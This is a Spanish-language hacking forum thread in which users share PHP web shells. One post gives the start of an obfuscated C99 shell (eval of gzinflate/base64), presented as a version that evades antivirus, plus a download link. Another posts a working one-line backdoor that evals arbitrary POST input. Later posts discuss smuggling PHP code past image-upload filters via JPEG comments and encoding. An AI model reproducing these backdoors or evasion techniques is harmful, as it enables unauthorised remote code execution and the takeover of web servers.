C99 Shell.php cifrado en base 64

[WHK]

Conseguí una verción del C99 shell cifrado en su totalidad para no ser descubierto por los antivirus.
Como dice un amigo: Enjoy!

<? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
[...]

[WHK]

excede el limite y no se ve el código completo  lo subo y lo cuelgo... one moment...
------>Post modificado
Listo:
http://rapidshare.com/files/38464292/aAkjd5D-WHK.rar

[laideker]

Esta bueno... 

[yeikos]

Mi PHP-Shell... 

Código [Seleccionar] Expandir

<?php
echo "<br><form method=\"POST\"><center><textarea name=\"var\" cols=\"40\" rows=\"10\"></textarea>
<br><input type=\"submit\"></center></form><p>".
eval(str_replace( ord(166), "'", str_replace( ord(167), "\"", $_POST['var'])))."</p>";
?>

[дٳŦ٭]

jeje, muy bueno. Una duda ¿la codificación es para burlar los A/V clientes o del server? no entiendo 

Otra, por ejemplo, tengo un server que opera con algún "mod" que cuando intentas subir una "imagen" (con código PHP, véase el tuto de codebreak) me tira error y una advertencia  ¿habrá alguna forma de saltarlo?

Saludos

[yeikos]

Si dices el mensaje quizás podamos ayudarte...

[Azielito]

Tal vez sea el de LFI???

el de los comentarios en el JPEG? ñ_ñ


Pos, podrias hacer lo mismo que hicieron con esta shell, usar la funcion eval()... (claro, tambien con base64_decode() ) ^^

[дٳŦ٭]

El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx".

No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro.

Saludos

[fitu]

disculpen mi ignoracia, pero la verdad no entiendo de q se trata 
baje el .rar y no comprendo para q sirve

[Deka_10]

disculpen mi ignoracia, pero la verdad no entiendo de q se trata 
baje el .rar y no comprendo para q sirve

entonces para que lo bajas?